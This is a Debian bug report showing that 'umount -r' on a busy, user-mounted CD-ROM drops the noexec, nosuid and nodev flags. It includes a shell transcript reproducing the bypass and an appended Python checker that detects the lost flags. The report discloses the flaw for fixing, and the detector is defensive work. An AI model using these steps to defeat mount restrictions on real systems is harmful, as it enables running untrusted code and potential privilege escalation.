Package: mount
Version: 2.11n-7
Severity: critical
File: /bin/umount
Tags: security
Justification: root security hole


Please see

  http://www.securityfocus.com/archive/1/410333

for details. Verified (that noexec flag is gone) as follows:

psz:~$ id
uid=1001(psz) gid=1001(amstaff) groups=1001(amstaff),24(cdrom),25(floppy)
psz:~$ grep cdrom /etc/fstab
/dev/cdrom      /cdrom          iso9660 ro,user,noauto          0       0
psz:~$ /bin/mount /cdrom
psz:~$ /bin/mount | grep cdrom
/dev/cdrom on /cdrom type iso9660 (ro,noexec,nosuid,nodev,user=psz)
psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin
bash: /cdrom/ML3/ML_30_013_Linuxi.bin: /bin/sh: bad interpreter: Permission denied
psz:~$ cd /cdrom
psz:/cdrom$ /bin/umount -r /cdrom
umount: /dev/cdrom busy - remounted read-only
psz:/cdrom$ cd
psz:~$ /bin/mount | grep cdrom
/dev/cdrom on /cdrom type iso9660 (ro)
psz:~$ /cdrom/ML3/ML_30_013_Linuxi.bin
Unpacking to /tmp/ML.tar...
[ctrl-C]
psz:~$ /bin/umount -r /cdrom
psz:~$ 


-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux pisa.maths.usyd.edu.au 2.4.27-smssvr1.6 #1 SMP Wed Aug 24 12:16:31 EST 2005 i686
Locale: LANG=C, LC_CTYPE=C

Versions of packages mount depends on:
ii  libc6                         2.2.5-11.8 GNU C Library: Shared libraries an
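
An added example, not part of the original report: a Python check that compares the restrictive flags implied by the fstab `user` option (noexec, nosuid, nodev) with the options on the live mount, using the fstab entry and the two `mount` output lines from the transcript above as sample input. The function names are hypothetical, and the parser assumes the `mount` output format shown in the report.

```python
import re

# fstab "user"/"users" imply these flags (mount(8)); values are the overrides.
IMPLIED = {"noexec": "exec", "nosuid": "suid", "nodev": "dev"}
MOUNT_LINE = re.compile(r"^(\S+) on (\S+) type (\S+) \((.*)\)$")


def expected_flags(fstab_text):
    """Map mount point -> restrictive flags that fstab requires for it."""
    required = {}
    for line in fstab_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].startswith("#"):
            continue
        flags = set()
        for opt in fields[3].split(","):  # later options override earlier ones
            if opt in ("user", "users"):
                flags |= set(IMPLIED)
            elif opt in IMPLIED:
                flags.add(opt)
            elif opt in IMPLIED.values():
                flags -= {k for k, v in IMPLIED.items() if v == opt}
        if flags:
            required[fields[1]] = flags
    return required


def missing_flags(fstab_text, mount_output):
    """Return {mount point: sorted flags} required by fstab but not live."""
    required = expected_flags(fstab_text)
    findings = {}
    for line in mount_output.splitlines():
        m = MOUNT_LINE.match(line.strip())
        if not m or m.group(2) not in required:
            continue
        lost = required[m.group(2)] - set(m.group(4).split(","))
        if lost:
            findings[m.group(2)] = sorted(lost)
    return findings


# Sample input: the fstab entry and the two mount lines from the transcript.
FSTAB = "/dev/cdrom      /cdrom          iso9660 ro,user,noauto          0       0"
BEFORE = "/dev/cdrom on /cdrom type iso9660 (ro,noexec,nosuid,nodev,user=psz)"
AFTER = "/dev/cdrom on /cdrom type iso9660 (ro)"

if __name__ == "__main__":
    print("before umount -r:", missing_flags(FSTAB, BEFORE))
    print("after  umount -r:", missing_flags(FSTAB, AFTER))
```

Run against real `/etc/fstab` contents and current `mount` output, a non-empty result marks a user-mountable filesystem that has lost its restrictions.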


